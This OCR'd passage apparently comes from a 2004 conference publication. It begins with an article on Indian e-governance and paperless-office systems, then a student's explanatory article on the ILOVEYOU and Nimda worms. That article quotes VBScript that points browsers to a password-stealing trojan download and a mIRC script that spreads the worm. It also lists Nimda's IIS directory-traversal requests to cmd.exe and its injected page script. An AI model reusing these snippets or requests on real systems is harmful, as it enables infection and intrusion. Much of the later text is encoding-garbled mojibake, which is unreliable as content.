practically possible without focusing specialattention on creation of gainful jobopportunities The Tenth plan at the nationallevel envisages creation of 50 million newemployment opportunities over a period of fiveyears Therefore focused attention will be givento few critical sectors such as

Industries Information Technology etcwhich have very high employment potential

Item 19 of the speech reads as followsThe manufacturing sector of the economy

has potential to absorb the surplus labour forceThe labour intensive manufacturing units canprovide gainful job opportunities for skilled aswell as semi-skilled labour force We willcontinue to encourage new entrepreneurs tochoose Pondicherry as their destination for

OITS-2004

35

establishing new industrial units andprocedures will be simplified to obtain licence permission to start units We will continue topursue the policies of promoting pollution freeless water and less power consuming industriesin our Union Territory

Item 20 of the speech reads as followsIndustrial Guidance Bureau with

integrated e-Platform has been established bysubstituting single window clearance system tospeed up the process of industrial clearance permission for setting up of new industrial unitsA total of 21 Departments includingMunicipalities Commune Panchayats havebeen integrated with a dedicated electronicnetwork for granting permission to set up anindustry and also to commence production

This saves a lot of time effort and cost toindustrialists and citizens as well as officials ofvarious Departments As against submitting 10copies of documents in the manual system inthe electronic system only one signed copy needsto be submitted thereby saving 90 of paperresulting in conserving of natural forestresources

A unique initiative being attempted for thefirst time in India 21 Departments includingmunicipalities and Panchayats are connectedon a simple dial-up The central repository serverwill be located at the District Industries CentrePondicherry This will form a dedicatedelectronic network The network will allow theGovernment to grant permission for example toset up an industry it can also help amanufacturing unit obtain a Licence tocommence production etc

Says Krishnan This would save a lot oftime effort and cost to industrialists and citizensas well as officials of various Departments As

opposed to submitting 10 copies of documentsin the manual system in the electronic systemonly one signed copy needs to be submittedthereby helping save paper It can help to fuelinvestment in the State and generateemployment for local people

Such an integrated e-Platform can be usedby the ministries and Undertakings of theCentral Government as well as various StateGovernments where ever multiple agencies areinvolved in scrutinizing applications andgranting time bound clearances for planapproval building constructions setting-upindustries etc It can bring about the muchdesired transparency and accountability

Various Central and State GovernmentDepartments and Undertakings including theAndhra Pradesh Technology Services theGovernments of West Bengal Orissa ManipurGoa etc State Bank of India the CanadianConsulate in Chennai British Trade Office(Bangalore) Ministry of Industrial DevelopmentMalaysia and the State of Sarawak Malaysiahave shown interest in e-Administration aweb enabled solution developed using opensource This can considerably cut down thebudget expenditure for e-Governance accordingto Krishnan

Instead of resting on their laurels LL2Bplans to reach out to the various GovernmentDepartments and Undertakings as well asCorporates SMEs and NGOs by implementingtheir solutions in as many public and privateorganisations as possible in India and thedeveloping world by offering the basic solutionfree and charging only for the customisationinstallation training hand holding annualmaintenance and upgrade support eitherdirectly or through ELCOT with whom LL2Bhas a marketing tie-up This is expected to benefit

OITS-2004

36

vastly Governments in India and the developingworld by saving on e-Governance expenditureWe are currently holding discussions with theChennai Metropolitan Development Authority(CMDA) and The Tamil Nadu Dr MGRMedical University to implement e-Administration in their offices institutionsacross the city says Krishnan

Shri D Jayakumar the Hon Minister forIT Govt of Tamil Nadu had stated in the StateAssembly

The Government has also decided to takeup development of four generic softwares paperless office electronic delivery of servicesdevelopment of government portal andintegrated district information system

Of these the paperless office was alreadyin place in ELCOT

While its naiumlve to believe that e-Administration paperless office solutions likeLL2Bs may just be the panacea for our red-taperidden bureaucracy it certainly is a step in theright direction one small step for e-governance a giant leap for democracy

Why ELCOT took the plunge

1 The number of major departments 42 The average number of files generated per

department per year 1503 The average number of physical

movements per file 204 The average number of cycles per file from

start to end 8The total number of manual entries file

movement from desk-to-desk per year4x150x20x8 = 96000 manual entries or filemovements per year

The workload is not evenly distributed asit depends on a hierarchy for granting sanctionandor approval of files The Managing Director(MD) typically has to view and approveapproximately 200 files per week That is anaverage of 40 files per working day This is apartfrom the various meetings he has to attend Filespile up when he is on tour and he is forced tocarry work home When the officer is away filesare kept pending The officer may not even knowthat there are files pending even if they are urgentThese problems cause inordinate delays in theworkflow process A tool such as e-Administration ensures prompt disposal of filesand access to a central database where the statusof files can be monitored at every stage thusensuring efficiency and transparency

Sudeep Jain MD ELCOT confirms thatwhile average cycle time for file approval wasearlier 15 to 21 days after the implementationof the electronic system it was brought down to5 to 7 days

Source E-ADMINISTRATION THE KEY FOR E-GOVERNANCE - INITIATIVES FORCREATING A PAPERLESS OFFICE bySudeep Jain IAS Managing Director ELCOTChennai-35 presented at the 7th National e-Gov Conference in Nov 2003 conducted by theDepartment of Administrative Reforms andPublic Grievances Ministry of PersonnelPublic Grievances and Pension Govt of India

Further enquiries on e-Administration or onimplementing e-Governance Corporate Governancemay be addressed to Mr Krishnan at krisdevgamilcom

OITS-2004

37

Intruders who access networks and systems without authorization or inside attackers withmalicious motives can plant various types of programs to cause damage to the network Theseprograms often lumped together under the general term viruses although other varieties have costcompanies and individuals billions of dollars in lost data lost productivity and the time andexpense of recovery Some of the more destructive examples of malicious code also sometimesreferred to as malware [MALicious softWARE - mark the uppercase MALWARE] over the pastdecade are CIHChernobyl Melissa Code Red Nimda Klez

Now Im going to explain about the two most popular malwares - some exploits which thesemalwares used but NOT how the whole code worked or how to code a malware to exploit

I Love You Worm

The I Love You virus is a little more bulky so I chose not to include the entire script here Youcan download all of the I Love You source from httpwwwpacketstormsecurityorgviral-dblove-letter-sourcetxt

What is interesting to note about the I Love You virus is that it randomly changed the usersdefault Web browser homepage to one of four locations as seen here by the code

num = Int((4 Rnd) + 1)if num = 1 thenregcreate HKCUSoftwareMicrosoftInternet ExplorerMainStart Pagehttpwwwskyinetnet~young1sHJKhjnwerhjkxcvytwertnMTF wetrdsfmhPnjw6587345gvsdf7679njbvYTWIN-BUGSFIXexe

elseif num = 2 thenregcreate HKCUSoftwareMicrosoftInternet ExplorerMainStart Pagehttpwwwskyinetnet~angelcatskladjflfdjghKJnwetryDGF ikjUIyqwerWe546786324hjk4jnHHGbvbmKLJKjhkqj4wWIN-BUGSFIXexe

elseif num = 3 thenregcreate HKCUSoftwareMicrosoftInternet ExplorerMainStart Pagehttpwwwskyinetnet~koichijf6TRjkcbGRpGqaq198vbFV5hfFE kbopBdQZnmPOhfgER67b3VbvgWIN-BUGSFIXexe

elseif num = 4 thenregcreate HKCUSoftwareMicrosoftInternet ExplorerMainStart Pagehttpwwwskyinetnet~chusdgfhjksdfjklNBmnfgkKLHjkqwtuHJB hAFSDGjkhYUgqwerasdjhPhjasfdglkNBhbqwebmznxcbvnmadshfgqw237461234 iuy7thjgWIN-BUGSFIXexe

end ifend if

Known Malware ExploitationAbhishek Bhuyan

KIIT Student

OITS-2004

38

The WIN-BUGSFIXexe turned out to be a Trojan application designed to steal passwordsNow a quick look notices all of the URLs present are on wwwskyinetnet This resulted in manyplaces simply blocking access to that single host While bad for skyinetnet it was an easy fix foradministrators Imagine if the virus creator has used more popular hosting sites such as the membershomepages of aolcom or even made reference to large sites such as yahoocom and hotmailcom would administrators rush to block those sites as well Perhaps not Also had someone at skyinetnetbeen smart they would have replaced the Trojan WIN-BUGSFIXexe with an application that woulddisinfect the system of the I Love You virus That is if administrators allowed infected machinesto download the Trojaned Trojan

I Love You also modifies the configuration files for mIRC a popular Windows IRC chat clientif (s=mirc32exe) or (s=mlink32exe) or (s=mircini) or(s=scriptini) or (s=mirchlp) thenset scriptini=fsoCreateTextFile(folderspecampscriptini)

scriptiniWriteLine [script]scriptiniWriteLine mIRC ScriptscriptiniWriteLine Please dont edit this script mIRC will corrupt if mIRC willscriptiniWriteLine corrupt WINDOWS will affect and will not run correctly thanksscriptiniWriteLine scriptiniWriteLine Khaled Mardam-BeyscriptiniWriteLine httpwwwmirccomscriptiniWriteLine scriptiniWriteLine n0=on 1JOINscriptiniWriteLine n1= if ( $nick == $me ) halt scriptiniWriteLine n2= dcc send $nick ampdirsystemampLOVE-LETTER-FOR-YOUHTMscriptiniWriteLine n3=scriptinicloseHere we see I Love You making a change that would cause the users IRC client to send a copy

of the I Love You virus to every person who joins a channel that the user is in Of course the filenamehas to be enticing to the users joining the channel so they are tempted into opening the file- Nimda Worm -

In September 2001 a very nasty worm reared its ugly head The Nimda (Just reverse nimdaand you get admin) worm also called the Concept viruswas another worm which propagated viaMicrosoft hostsNimda featured multiple methods to infect a host

It could send itself via e-mail It would attach itself as an encoded exe file but would use anaudiox-wave Multipurpose Internet Mail Extensions (MIME) type which triggered a bug in InternetExplorer to automatically execute the attachment upon previewing the e-mail Once the attachmentwas executed the worm would send itself to people in the users address book as well as e-mailaddresses found on Web pages in Internet Explorers Web page cachethat means the worm wouldactually find e-mail addresses on recently browsed Web pages The worm would scan for vulnerableIIS machines looking for the rootexe files left over from the Code Red II and Sadmind worms aswell as using various Unicode and double-encoding URL tricks in order to execute commands onthe serverThe following is a list of requests made by the worm

GET scriptsrootexec+dir

OITS-2004

39

GET cwinntsystem32cmdexec+dirGET dwinntsystem32cmdexec+dirGET MSADCrootexec+dirGET scripts5cwinntsystem32cmdexec+dirGET scriptsxc1x1cwinntsystem32cmdexec+dirGET scriptsxc0winntsystem32cmdexec+dirGET scriptsxc0xafwinntsystem32cmdexec+dirGET scriptsxc1x9cwinntsystem32cmdexec+dirGET scripts35cwinntsystem32cmdexec+dirGET scripts35cwinntsystem32cmdexec+dirGET scripts5cwinntsystem32cmdexec+dirGET scripts2fwinntsystem32cmdexec+dirGET _vti_bin5c5c5cwinntsystem32cmdexec+dirGET _mem_bin5c5c5cwinntsystem32cmdexec+dirGET msadc5c5c5cxc1x1cxc1x1cxc1x1cwinntsystem32

cmdexec+dirOnce the worm found a vulnerable IIS server it would attempt to Trivial File Transfer Protocol

(TFTP) the worm code to the target server It would also modify the IIS server by creating a guestaccount and adding it to the Administrators group It would also create a Windows share of theC drive (using the name C$)

All local hypertext markup language (HTML) and Application Service Provider (ASP) fileswould be modified to include the following code snippet

ltscript language=JavaScriptgtwindowopen(readmeeml null resizable=notop=6000left=6000)ltscriptgtIn addition the worm would copy itself to the readmeeml file The final result was that

unsuspecting Web surfers would automatically download and possibly execute the worm froman infected Web site

The worm copies itself into EML and NWS in various local and network directories If anunsuspecting user uses Windows Explorer to browse a directory containing these files it is possiblethat the automatic preview function of Explorer would automatically execute the worm This wouldallow the worm to propagate over file shares on a local network

The worm also copies itself to richeddll which is an attempt to Trojan Microsoft Officedocuments since documents opened in the same directory as the richeddll binary will load andexecute the Trojan DLL

The end result was a noisy but very effective worm It was noisy because it created many EMLand NWS files on the local system It also modified Web pages on the Web site which made it easyto remotely detect a compromised server But the multi-infection methods proved quite effective andmany people who had run through and removed the worm had found that their systems keptgetting infectedit is a tough worm to fully eradicate To properly combat it the securityadministrator needed to patch their IIS server upgrade their Microsoft Outlook client and be cautiousof browsing network shares Full information on the Nimda worm is available in the Security Focusanalysis

httparissecurityfocuscomalertsnimda010921-Analysis-Nimda-v2pdf

OITS-2004

40

Some tips on prevention and responseProtecting systems and networks from the damage caused by Trojan horses viruses and

worms is mostly a matter of common sense Practices that can help prevent infection include thefollowing Do not run executable (EXE) files from unknown sources including those attached to an e-

mail or downloaded from web sites Turn off the Preview andor HTML mail options in the e-mail client program Do not open Microsoft Office documents from unknown sources without first disabling

macros Be careful about using diskettes that have been used in other computers Install and use firewall software Install antivirus software configuring it to run scans automatically at predefined times and

updating the definition files regularly Use intrusion prevention tools called behavior blockers that deny programs the ability to

execute operations that have not been explicitly permitted Use integrity checker software (such as Tripwire) to scan the system for changes Recognizing the presence of a malicious code is the first-response step if a system gets infected

Administrators and users need to be on the alert for common indications that a virus mightbe present such as the followingMissing files or programsUnexplained changes to the systems configurationUnexpected and unexplained displays messages or soundsNew files or programs that suddenly appear with no explanationMemory leaks (less available system memory than normal)Unexplained use of disk spaceAny other odd or unexplained behavior of programs or the operating system

- If a virus is suspected a good antivirus program should be installed and run to scan thesystem for viruses and attempt to remove or quarantine any that are found Finally allmission-critical or irreplaceable data should be backed up on a regular basis in case all thesemeasures fail

Virus writers are a creative and persistent bunch and will continue to come up with new waysto do the impossible so computer users should never assume that any particular file type or OSis immune to malicious code The only sure way to protect against viruses is to power down thecomputer and leave it turned off -)

Information about specific viruses and instructions on how to clean an infected system isavailable at httpwwwsymanteccom and httpwwwmcafeecom Both antivirus vendorsprovide detailed databases that list and describe known viruses But I recommend being touch withthe site httpwwwsecuritynewsportalcom here you will get hourly updates about latest securityhacking virus and trojan news

luckylucky-webnethttpwwwlucky-webnet

Orissa Network Security Group httpgroupsyahoocomgrouporissa-netsec

OITS-2004

41

LOtilde`EcircOcircVethornethorn S_ecirc J aTHORNLETHhOgraveSOcircETH[THORN eamp_ OgravekthornETH[ETH

LTHORNVccedil XTHORNcccedilXccedil aTHORNhegraveaTHORN]OcircETHfmacrAElig bEcircthornaOgrave_hegraveethorn

ASTHORNLETHmTHORNthorn LfETH aTHORNsETH_ aETHZTHORNSOcirc ethornETHS_Ntilde[THORNHaOtilde agrave_Ntilde[THORN A]THORN jcordfAElig Ogravel[oumlOgraveethorn LOtilde`EcircOcircVeethornthornakEcircthornf aOcircakthornETHethorn OgravekthornDRTHORNfrac14frac14ETH Ograve[ZEcirc HkTHORNthorn dsectAEligVTHORNaTHORNimacrAEligOgraveethorn LTHORNRTHORN SETHZTHORNaETH Acethorn jETHcETHSTHORNL LragravethornaOcircfrac14frac14ETHd]THORNJ LOtilde`EcircOcircVethorn aTHORNsETH_ HL A^Ecirc_THORNL aTHORN]OcircETHbthornETHaOgraveethorn `eTHORNthornNZTHORN[ HkthornETH `EcircethornETH[_ dEcircNeEcircthorn aTHORNhegraveethornjcordfAElig aTHORN]OcircETHOgraveethorn Aacutecurren akEcircthornOgrave[ D`OgravedETHN OgravekthornETHBAjEcircRTHORNfrac14frac14ETH HL]ETH SOgraveZ XETHbrvbarAEligethorn SOgraveZ LOtilde`EcircOcircVethornaTHORNOgravehyacuteiL HaOtilde jTHORNbTHORNthornmccedilthorn dsectAEligNtildefrac14 c^OcircOgraveethorn aTHORNaETH]mthornETHNTHORNmthornETHfrac14frac14ETH XETHbrvbarAEligethorn dEcircbrvbarTHORNAEligLOgravemthorn bthornNaETH_ccedil A]ETHcccedilEcircfrac14NYIumlTHORNOgravemthornfrac14frac14ETH Bbccedilthorn OgraveplusmnAEligETH`QETHethorn cETH^OcirccOgraveethorn A]ETHcccedilfrac14NbagravethorneEcircthorn AaTHORNbagravethornETHa OgravekthornOgravemthornfrac14frac14ETH `Ograveethorn `Ograveethorn joacutefrac12THORNcurrenaYIumlTHORNQETHmTHORNthornmthornETHfrac14frac14ETH Ograve[ZEcirc XETHbrvbarAEligethornNtilde aTHORN]OcircETH kUacutethorn jaagrave EcircethornETH[_frac14frac14ETHHkthornETH hEcircZTHORN jTHORNbTHORNthornmccedilthorn dsectAEligNtilde LkTHORNthornOgravemthorn _UumlETH _UumlETH bthornNaETH_ccedil`otildeOgravec jegraveNagraveLEcirc _THORNcagraveETHZ LOgravemthornfrac14frac14ETH HkthornETH`Ograveethorn `oacuteTHORNaNtildejoacutefrac12THORNcurren OgravekthornmthornETHfrac14frac14ETH OgravejTHORN ETHBUuml jTHORNbTHORNthornmccedilthorn dsectAEligNtildefrac14ethornAahOcircL[ETH OgravekthornETHBTHORNmthornETHfrac14frac14ETH Ograve[ZEcirc jTHORNbTHORNthornmccedilthorn BampTHORNfrac14_THORN AEligeTHORNOtildethornOgravekthornDRTHORN jaagrave EcircethornETH[_ aTHORN]OcircETHfrac14frac14ETH jaEcirc hEcircZTHORN LOtilde`EcircOcircVethornaTHORNOgravehyacuteiL Aacutecurren kthornjTHORN Drthornethorn Ograve]Ogravemthorn A`ZcETHOgrave_`otildeOgrave[OcircL aTHORN]OcircETHLEcirc HL _THORN~Ugravefrac12curren LotildecOgraveethorn `otildeLETHhLeEcircthornRlaquoTHORNAEligAEligfrac14frac14ETH agraveETH[ccedil HL LETHdagraveOcirc jeTHORNthornaETH `Ograveethorn ]eacuteTHORN[NtildemacrAEligLETHdagraveOcirc LeTHORNthornaETHethorn `w[THORN OgraveLDUuml aTHORN]OcircETHOgraveethorn ethornkTHORNthornRTHORN HkthornETH hEcircZTHORNaETH`Ograveethorn XETHbrvbarAEligethorn HaOtilde jTHORNbTHORNthornmccedilthorn BOtildeSTHORN_THORN AEligethornordfAElig AEligAElig OgravekthornETHB dETHBTHORNOgravemthornfrac14frac14ETH HkthornETHkUacutethorn LOtilde`EcircOcircVethorn aTHORN]OcircETHethorncEumlfcsectAEligfrac14frac14ETH LOtilde`EcircOcircVethornethorn aTHORNaragravethorn_LEcirc _Ecirc OcircETH_ LOgravemthorn

AOgravecdividecETHOgrave_ SETHZTHORN ETHeTHORNthornaETH Ograved A^Ecirc_THORNL LOtilde`EcircOcircVethornethornS_L OgravekthornDRlaquoTHORNAEligAElig QETHmccedilthornjagrave aOcircETHOgraveaSccedilfrac14frac14ETH Ogravej 1834cjTHORNkthornETHOgraveethorn A_ETHmTHORNthornVTHORNLETHmccedilthorn BampTHORNfrac14_ccedil _ETHcLLOtilde`EcircOcircVethornVTHORNH DiexclthornETHa_ LeTHORNthornBOgravemthornfrac14frac14ETH `Ograveethorn `OgraveethornS_ccedil bTHORNthorn_THORNOgravejAtildeccedilcurren AVETH_ETHj$ccedilfrac14 HaOtilde LiacuteTHORNOgrave$frac14ETHXagraveIuml OgraveaeTHORNthorncTHORNhTHORN ABgETH Ogravefrac12currenVccedil macrEcircAElig_THORNbthornethornjTHORNVTHORNOgraveethorn `otildecBOgravemthornOgraveIacuteAEligETH_THORNLccediljccedil (Electronics) LOtilde`EcircOcircVethorn[THORNAeTHORNthorn LeTHORNthornTHORNOgravemthornfrac14frac14ETH HkTHORNthornWETHOgraveethorn kUacutethorn $frac14ETHfrac12currenOgraveSOgrave_Ograveethornj_ccedil (First Generation)LOtilde`EcircOcircVethornethorn S_ecirc OgravekthornETHBTHORNmthornETHfrac14frac14ETH ]eacuteTHORN[NtildemacrAElig aTHORNhegravedEcircwjcmacrAEligOgraveethorn H_THORNALccedil (ENIAC) LOtilde`EcircOcircVethorn _THORNcUgrave[OgravekthornETHBTHORNmthornETHfrac14frac14ETH 1946 cjTHORNkthornETHOgraveethorn _THORNcUgrave[ HkTHORNthornLOtilde`EcircOcircVethornLEcirc ethornMTHORNaETH `ETHBUuml 50 $Ecircfrac14Vccedil x 30 $Ecircfrac14VccedilOethornethorn AahOcircL[ETH OgravekthornETHBTHORNmthornETH HaOtilde HkthornETHethorn JS_THORNmthornETH 30 V_ccedilfrac14frac14ETH HkTHORNthorn LOtilde`EcircOcircVethornOgraveethorn 18000bthornOcircETHLEcirccccedil VEcircOcircaccedil (Vaccum tube) mthornETHNTHORNTHORNmthornETHfrac14frac14ETHHkthornETH HL OgravejOgraveLumlAEligOgraveethorn 5000 `dagraveOcirclaquoAElig cTHORNhETHZ(Addition) LeTHORNthorn `ETHeEcircthornTHORNmthornETHfrac14frac14ETH HkthornETH c_EcirciOcircWETHeEcircthorn[OcirclaquoAEligAElig lTHORN otilde THORNmthornETHfrac14 j[ cETH[ouml aragravethorncETH_ethornLOtilde`EcircOcircVethornWETHeEcircthorn dOgravefrac12curren cxethorn THORNmthornETHfrac14frac14ETH `Ograveethorn `Ograveethorn1948 cjTHORNkthornETHOgraveethorn HLVagrave HaOtilde cOcircETHLccedilOgravemthorn cTHORNhTHORNHXccedilbthornETHLccedil (EDVAC) _ETHcL HL D_iuml[cETH_ethornLOtilde`EcircOcircVethornVTHORNH Ograve`_ccediljTHORNmccedilthornbthornETH_THORNAUuml aTHORNhegraveaTHORN]OcircETHfmacrAEligOgraveethornDiexclthornETHa_ LOgravemthornfrac14frac14ETH 1951Ograveethorn ]EcircOgravekthornUuml cTHORNhTHORN Ogravej_ccediljjccedilaEcircOcircOgraveethornETH (Census beaureau)Ograveethorn aOcircakthornETHethorn

OITS-2004

42

`ETHBUuml macrEcircAElig_THORNbthornETHLccedil LOtilde`EcircOcircVethorn [THORNAeTHORNthorn LOgravemthornfrac14frac14ETH HTHORNOgraveethornQEcirccegraveLNtildemacrAElig OgraveV`ccedilOgraveethorn [Ocirc ethornkTHORNthornaETH Aethorncdivide OgravekthornmthornETHfrac14frac14ETHHkthornETH OgravekthornDRTHORN `otildec aOcircajETHmacrTHORNAEligL bTHORNthornrTHORNthornOgraveethorn aOcircakoacutethorn[LOtilde`EcircOcircVethornfrac14frac14ETH HkTHORNthorn `otildec `THORNYIumlNtildeethorn LOtilde`EcircOcircVethorn [oacuteVTHORNdEcircbrvbarAEligTHORNmthornETH HaOtilde Ograve_L SETHNETH cETHXIumlTHORN ajEcircTHORNmthornETHfrac14frac14ETH 1947cjTHORNkthornETHOgraveethorn Ograveamccedilthorn mthornETHOgraveaETHOgraveethornOgraveVETHeTHORNthornOgraveethorn (Bell Lab)VoumlETH_ccedilSTHORNfrac12currenethornethorn DiexclthornETHa_ OVTHORNTHORNmthornETHfrac14frac14ETH bthornOcircETHLEcirccccedil VEcircOcircaccedila]fOgraveethorn VoumlETH_ccedilSTHORNfrac12currenethornethorn aOcircakthornETHethorn ]eacuteTHORN[NtildemacrAElig `THORNYIumlNtildeethornLOtilde`EcircOcircVethornLEcirc S_ecirc Ograve]mthornETHfrac14frac14ETH Lcccedil Mnagrave OgraveRETHV ALETHethornHaOtilde ^THORNL aTHORNhegraveordfAElig OgravekthornETHBTHORNaETHeEcircthorn HkTHORNthorn `THORNYIumlNtildeethornLOtilde`EcircOcircVethornethorn QETHkTHORNthorn]ETH aoacutewTHORN `ETHBmthornETHfrac14frac14ETH cETH[ouml NETHZTHORN[THORNLHaOtilde aOcircajETHmacrTHORNAEligL aTHORNOgravehyacuteiZ `ETHBUuml ]EcircB`otildeLETHethornethorn`w[THORN aOcircakoacutethorn[ OgravekthornDTHORNmthornETH dETHkthornETHLTHORN [OcirclaquoAEligAElig MnagraveETHlaquoAEligAEligaOcircETH`ETHethorn THORNmthornETHfrac14frac14ETH 1958Ograveethorn BAtildeTHORNcurrenOgraveNotildeOgraveVXccedil jLUgraveVccedil(Integrated circuit) DiexclthornETHaTHORN[ OgravekthornaETH`OgraveethornXTHORNSTHORNVETHmccedilthorn LOgrave`agraveETHOgraveethornj_ccedil (DigitalCorporation) OgraveNETHVTHORNH cTHORN_THORN LOtilde`EcircOcircVethorn [THORNAeTHORNthornLmthornETH dETHkthornETHLTHORN 15000 XmthornETHethornccedilOgraveethorn aTHORNLotildeTHORNOgravekthornETHBTHORNmthornETHfrac14frac14ETH `Ograveethorn ABaTHORNHcccedil (IBM) c^Ocirc[ETHethorn 360 jTHORNeTHORNthornSccedil (series) LOtilde`EcircOcircVethorn [THORNAeTHORNthornLmthornETHfrac14frac14ETH HkTHORNthornjaEcirc LOtilde`EcircOcircVethornNEcircXIumlTHORNL [oacute[NtildemacrAElig `THORNYIumlNtildeLOtilde`EcircOcircVethorn bthornETHaOgraveethorn `eTHORNthornNZTHORN[frac14frac14ETH `otildeOgravecOgrave`otildeETHNotildeETHcccedilethorncETHOgrave_ `iacuteNccedil OgraveaETHXagrave HaOtilde [ETHethorn aOcircakthornETHethornLeTHORNthorn LOtilde`EcircOcircVethorn jkthorn OgravedETHNETHOgravedETHN LeEcircthornTHORNOgravemthornfrac14frac14ETHHTHORNOgraveethorn 0 HaOtilde 1 LEcirc aTHORNbTHORNthorn_iuml YETHqETHOgraveethorn HAtildeoumlTHORNcurrenLethornETHdETHDTHORNmthornETHfrac14frac14ETH `Ograveethorn OgraveLETHamccedilthorn HaOtilde $frac14ethornccedilVoumlETH_ccedil `eTHORNthornbthornETHiETH HkTHORNthorn Lfrac12currenLethorn `w[THORNLEcirc jethornf LeTHORNthornOgrave]mthornETHfrac14frac14ETH1971 cjTHORNkthornETHOgraveethorn BOgraveAtildecurrenmccedilthorn _ETHcL HL LshyAEligETH_NtildecETHBOgraveLotildeETHOgrave`otildeETHOgravejjeccedilthorn (Microprocessor)

[THORNAeTHORNthorn LmthornETHfrac14frac14ETH HkthornETH kthornSETHethorn kthornSETHethorn VoumlETH_ccedilSTHORNfrac12currenethornLEcirc_THORNS c^OcircOgraveethorn HL OgraveRETHV QTHORN ccedil cETH^OcirccOgraveethorn ethornMTHORN`ETHeEcircthornTHORNmthornETHfrac14frac14ETH HkthornETHethorn D`ugraverTHORNthorn kUacutethorn Q[Ecircagrave `THORNYIumlNtildeLOtilde`EcircOcircVethornethorn S_ecirc OVETHBmthornETHfrac14frac14ETH HkthornETHethorn D`OgravedETHNOgravekthornaETH$frac14fOgraveethorn LOtilde`EcircOcircVethornethorn ALETHethorn AhETH[Ntilde[bthornETHaOgraveethorn LcTHORNNmthornETHfrac14frac14ETH Lcccedil Mnagrave HaOtilde ^THORNL OgraveaNHkthornETHLEcirc ^THORNL OgravemthornETHL`otildeTHORN AElig LethornETHBmthornETHfrac14frac14ETH 1981OgraveethornABaTHORNHcccedil (IBM) LshyAEligETH_Ntilde [ETHethorn `otildec`jagrave_ETHmccedilthorn LOtilde`EcircOcircVethorn [THORNAeTHORNthorn LmthornETHfrac14frac14ETH AOgraveceTHORNthornLETHethornVETHBcccedil cETHNETHSTHORN_ccedil (Time Magazine) HkthornETHLEcircMan of the Year AMOcircETH Ograve]mthornETHfrac14frac14ETH Q[Ecircagrave`THORNYIumlNtildeethorn LOtilde`EcircOcircVethornethorn QETHkTHORNthorn]ETH aoacutewTHORN `ETHBaETHeEcircthorn HkthornETHLEcircLTHORN eTHORNthorn Ograve]szlig_tTHORN_ LETHdagraveOcircOgraveethorn aOcircakthornETHethorn LeTHORNthornOgravekthornaOgravejTHORN ETHBUuml OgraveaszligsETH_THORNLcETHOgrave_ [`ugraveethorn OgravekthornETHBDWTHORNOgravemthornfrac14frac14ETH1970 eEcircthorn 1980 cjTHORNkthornETH c^OcircOgraveethorn LOtilde`EcircOcircVethornOgravecETHVETHOgravecETHVTHORN bthornETHaOgraveethorn AOgraveceTHORNthornLETHaETHjNtildefrac14ethorn koacutethorn]macrAEligLEcirc^THORNLETHethorn LeTHORNthornjETHeTHORNthornTHORNmthornETHfrac14frac14ETH AOgraveceTHORNthornLETHethornjEcirc ethorncETHOgraveLagraveVccedilNEcircXIumlTHORNL OgravejcETH_frac14ethorn LETHDAtildecurrenethorn ANOgraveethornLOtilde`EcircOcircVethorn OgraveLETHXIumlTHORNOtilde (Computer coding)OgravekthornETHBTHORNaETH QflaquoAEligETH aOcircETH_ethornccedilcETH_ mthornNETHBaETH AethorncdivideLOgravemthornfrac14frac14ETH

1976 cjTHORNkthornETHOgraveethorn OgraveSOgrave_ethornETHmccedilthorn OgravecETHVethornccediljccedilLshyAEligETH_Ntilde `otildec ethorn `ETHBUuml [ETHethorn LETHethornccedilOgraveethornLOtilde`EcircOcircVethornVTHORNH mthornNETHBmthornETHfrac14frac14ETH HkTHORNthorn LOtilde`EcircOcircVethornVTHORN LETHethornccedilethornOgraveaN Ograve[szligfethorn `eTHORNthorncETHZ aOcircETHOgraveVethornNtildeethorn OgravemthornOgravebthornmccedilthornOgrave[szligfethorn QETH` HaOtilde BOtildeSTHORN_ccedilethorn ayETHLEcirc Ograved OgraveLtimesZjTHORNjcmacrAEligOgraveethorn cETH`THORN `ETHeEcircthornTHORNmthornETHfrac14frac14ETH 1978 cjTHORNkthornETHethorn _OcircHL OVZETH jcNotilde `oacuteTHORNaNtildeaETHjNtildeEcircfrac14 QcLuacuteIgrave[LeTHORNthornTHORNmthornETHfrac14frac14ETH HkTHORNthornaiagrave OgraveQjccedilethorn NotildeETHumlccedilAElig cETHfrac12currenethorn `THORNVeccedilthorn

OITS-2004

43

aTHORN AEligjTHORNjccedilEcircfrac14 LOtilde`EcircOcircVethorn OgraveQjccedil OgraveMfOgraveethorn kthornethornETHBTHORNmthornETHfrac14frac14ETHaTHORNsETH_ethorn NotildeN[THORN jkthorn jETH^ETHethornZ OgravemthornETHL LTHORN eTHORNthornLOtilde`EcircOcircVethornLEcirc akEcircthornf bthornETHaOgraveethorn aOcircakthornETHethorn LeTHORNthorn ETHeTHORNthornOgraveaOgravejTHORN ETHBUuml OgraveaszligsETH_THORNLcETHOgrave_ `otildeOgraveQfrac12currenETH QfETHBOgravemthornfrac14frac14ETHOgraveSethornmicroAElig HaOtilde A`mccedilthorn (Apple) LshyAEligETH_NtildeLOtilde`EcircOcircVethornLEcirc QfETHBaETH`ETHBUuml jkthornS D`ETHmacrAElig aETHkthornETHethornLOgravemthornfrac14frac14ETH `Ograveethorn `Ograveethorn cETHBOgraveLotildeETHj$ccedilfrac14Vccedil(Microsoft)ethorn Windowsethorn DiexclthornETHa_jETH^ETHethornZ OgravemthornETHLfrac14ethorn QETHkTHORNthorn]ETHLEcirc dOgravefrac12curren aYIumlETHBmthornETHfrac14frac14ETHaragravethorncETH_ccedil AOgravec `qc `THORNYIumlNtildeethorn LOtilde`EcircOcircVethorn D`OgraveethornAOgravemthornETHQ_ETH LeTHORNthornaETHfrac14frac14ETH HkthornETHethorn NotildeN[THORN `ETHBUumlOgraveaszligsETH_THORNLcETHOgrave_ ]THORN_ethornETH[THORN NOgraveaiZETH LeTHORNthorn _EumlA _EumlA[Ocirc cETH^OcirccOgraveethorn `oacuteTHORNaNtildeaETHjNtildeEcircfrac14 QLTHORN[ LeTHORNthornaETHOgraveethornmthornETHNTHORNRlaquoTHORNAEligAEligfrac14frac14ETH HkTHORNthorn `THORNYIumlNtildeethorn LOtilde`EcircOcircVethorn cZTHORNi `eTHORNthorn QTHORNlaquoAEligAEligETHLeTHORNthorn ETHOgraveethornfrac14frac14ETH HkthornETH Ograve]MTHORN ETHOgraveethorn lethorn QTHORNkiumlTHORNthorn ETHOgraveethornHaOtilde cZTHORNi `eTHORNthorn _Ecircbthorna LeTHORNthorn ETHOgraveethornfrac14frac14ETH jaEcircWETHeEcircthorncSETHLETH OgravekthornmthornETH HkthornETH hveEcircthorn bTHORNthorn_iuml bTHORNthorn_iuml OgravemthornETHLEcircfrac14QTHORNkiumlTHORNthorn ETHOgraveethorn HaOtilde RaTHORNeEcircthorn c^Ocirc aTHORNOgravehyacuteiZ LeTHORNthorn 